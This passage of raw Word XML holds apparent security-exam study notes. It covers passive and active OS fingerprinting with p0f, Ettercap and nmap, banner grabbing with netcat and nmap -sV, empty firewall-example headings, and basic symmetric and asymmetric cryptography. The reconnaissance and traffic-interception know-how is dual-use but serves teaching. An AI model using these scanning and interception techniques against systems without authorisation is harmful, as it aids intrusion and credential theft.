          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>P0f is a versatile passive OS fingerprinting tool. P0f can identify the system on machines that connect to your box, ma</w:t>
      </w:r>
      <w:r w:rsidR="009A7BE6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chines you connect to, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">machines </w:t>
      </w:r>
      <w:r w:rsidR="009A7BE6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whose traffic can be observed on the network</w:t>
      </w:r>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00077B5B" w:rsidRDefault="009A7BE6" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00683C60" w:rsidRDefault="00683C60" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ettercap –</w:t>
      </w:r>
      <w:r w:rsidRPr="00683C60">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ettercap includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00683C60">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OS fingerprinting: determine the OS of the victim host and its network adapter.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00683C60">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80AD8" w:rsidRDefault="00E80AD8" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00683C60" w:rsidRDefault="00E76C47" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nmap – active fingerprinting</w:t>
      </w:r>
      <w:r w:rsidR="00077B5B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRPr="0039512C" w:rsidRDefault="00077B5B" w:rsidP="0039512C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –O [--fuzzy]</w:t>
      </w:r>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">OS detection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzzy option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gives</w:t>
      </w:r>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a more aggressive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> guess)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002443AB" w:rsidRPr="002443AB" w:rsidRDefault="002443AB" w:rsidP="002443AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B9 - </w:t>
      </w:r>
      <w:r w:rsidRPr="002443AB">
        <w:t xml:space="preserve">Application Fingerprinting </w:t>
      </w:r>
      <w:r>
        <w:t>and Evaluating Unknown Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002443AB" w:rsidRPr="002443AB" w:rsidRDefault="002443AB" w:rsidP="002443AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B9a - </w:t>
      </w:r>
      <w:r w:rsidRPr="002443AB">
        <w:t>Determining server types and network application ve</w:t>
      </w:r>
      <w:r>
        <w:t>rsions from application banners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80AD8" w:rsidRDefault="00E80AD8" w:rsidP="002443AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002443AB" w:rsidRDefault="00E80AD8" w:rsidP="002443AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> –netcat to port and view banner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80AD8" w:rsidRDefault="00E80AD8" w:rsidP="002443AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> version scanning will banner grab too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="002443AB" w:rsidP="002443AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B9b - </w:t>
      </w:r>
      <w:r w:rsidR="00E80AD8">
        <w:t>Evaluation of responsive from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unknown network applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7BE6" w:rsidRDefault="00E80AD8" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use nmaps, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, amap and view responses within packet captures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="009A7BE6" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nmap –sV is the best option for version detection.</w:t>
      </w:r>
      <w:r w:rsidR="00E80AD8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B10 - Network Access Control Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B10a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7A90">
        <w:t>Reviewing firewall rule bases a</w:t>
      </w:r>
      <w:r>
        <w:t>nd network access control lists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IPTables example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cisco Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solaris IPF example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Checkpoint  FW1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B11 – Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B11a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7A90">
        <w:t xml:space="preserve">Differences </w:t>
      </w:r>
      <w:r>
        <w:t>between encryption and encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010166F" w:rsidRPr="0010166F" w:rsidRDefault="0010166F" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010166F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding is changing the way data is presented using a public, generally-understood, and (usually) low-overhead method. It is used for the purpose of allowing the data to survive intact and easily recoverable after some sort of transfer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010166F" w:rsidRPr="0010166F" w:rsidRDefault="0010166F" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010166F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption is changing the way data is presented using a method or a key that is restricted and is often computationally intensive. It is used for the purpose of shielding the data from some people while making it available to others. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="0010166F" w:rsidRDefault="0010166F" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010166F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In short, encoding is for preservation, encryption is for obfuscation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B11b - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7A90">
        <w:t>Symmetric / asymmetric encryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010166F" w:rsidRPr="0010166F" w:rsidRDefault="0010166F" w:rsidP="0010166F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRPr="00F87566" w:rsidRDefault="00F87566" w:rsidP="00F87566">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Symmetric encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRPr="00F87566" w:rsidRDefault="0010166F" w:rsidP="00F87566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A secret key, which can be a number, a word, or just a string of random letters, is applied to the text of a message to change the content in a particular way. This might be as simple as shifting each letter by a number of places in the alphabet. As long as both sender and recipient know the secret key, they can encrypt and decrypt all messages that use this key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010166F" w:rsidRPr="00F87566" w:rsidRDefault="00F87566" w:rsidP="00F87566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Popular and well-respected symmetric algorithms include Twofish, Serpent, AES (Rijndael), Blowfish, CAST5, RC4, TDES, and IDEA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRPr="00F87566" w:rsidRDefault="00F87566" w:rsidP="00F87566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Many modern block ciphers are based on a construction proposed by Horst Feistel. Feistel's construction allows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to build</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> invertible functions from other functions that are themselves not invertible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRPr="00F87566" w:rsidRDefault="00F87566" w:rsidP="00F87566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Symmetric ciphers have historically been susceptible to known-plaintext attacks, chosen plaintext attacks, differential cryptanalysis and linear cryptanalysis. Careful construction of the functions for each round can greatly reduce the chances of a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRDefault="00F87566" w:rsidP="00F87566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>When used with asymmetric ciphers for key transfer, pseudorandom key generators are nearly always used to generate the symmetric cipher session keys. However, lack of randomness in those generators or in their initialization vectors is disastrous and has led to cryptanalytic breaks in the past. Therefore, it is essential that an implementation uses a source of high entropy for its initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRPr="00F87566" w:rsidRDefault="00F87566" w:rsidP="00F87566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>equire a secure initial exchange of one or more secret keys to both sender and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> receiver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010166F" w:rsidRPr="00F87566" w:rsidRDefault="0010166F" w:rsidP="0010166F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRPr="00F87566" w:rsidRDefault="00F87566" w:rsidP="00F87566">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87566">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Asymmetric Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="00C853E6" w:rsidRDefault="0010166F" w:rsidP="00C853E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C853E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The problem with secret keys is exchanging them over the Internet or a large network while preventing them from falling into the wrong hands. Anyone who knows the secret key can decrypt the message. One answer is asymmetric encryption, in which there are two related keys--a key pair. A public key is made freely available to anyone who might want to send you a message. A second, private key is kept secret, so that only you know it.  Any message (text, binary files, or documents) that are encrypted by using the public key can only be decrypted by applying the same algorithm, but by using the matching private key. Any message that is encrypted by using the private key can only be decrypted by using the matching public key. This means that you do not have to worry about passing public keys over the Internet (the keys are supposed to be public). A problem with asymmetric encryption, however, is that it is slower than symmetric encryption. It requires far more processing power to both encrypt and decrypt the content of the message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRDefault="00C853E6" w:rsidP="00C853E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C853E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use of</w:t>
      </w:r>
      <w:r w:rsidR="00F87566" w:rsidRPr="00C853E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Public key cryptography allows protection of the authenticity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(and non-repudiation)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C853E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F87566" w:rsidRPr="00C853E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of a message by creating a digital signature of a message using the private key, which can be verified using the public key. It also allows protection of the confidentiality and integrity of a message, by public key encryption, encrypting the message using the public key, which can only be decrypted using the private key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87566" w:rsidRPr="007B1FEB" w:rsidRDefault="00C853E6" w:rsidP="00F87566">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weaknesses in the certificate change can lead to compromise. Compromised keys need to be revoked immediately. Certificate authorities need to be trusted and ensure that they correctly vouch for the ID of the person they issue certificates for. Man-in the middle attacks are also possible</w:t>
      </w:r>
      <w:r w:rsidR="00C10DED">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the certificate path is not fully checked. </w:t>
      </w:r>
      <w:r w:rsidR="00C10DED" w:rsidRPr="00C10DED">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>When a private key used for certificate creation higher in the PKI server hierarchy is compromised or accidentally disclosed then a man in the middle attack is possible, making any subordinate certificate wholly insecure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
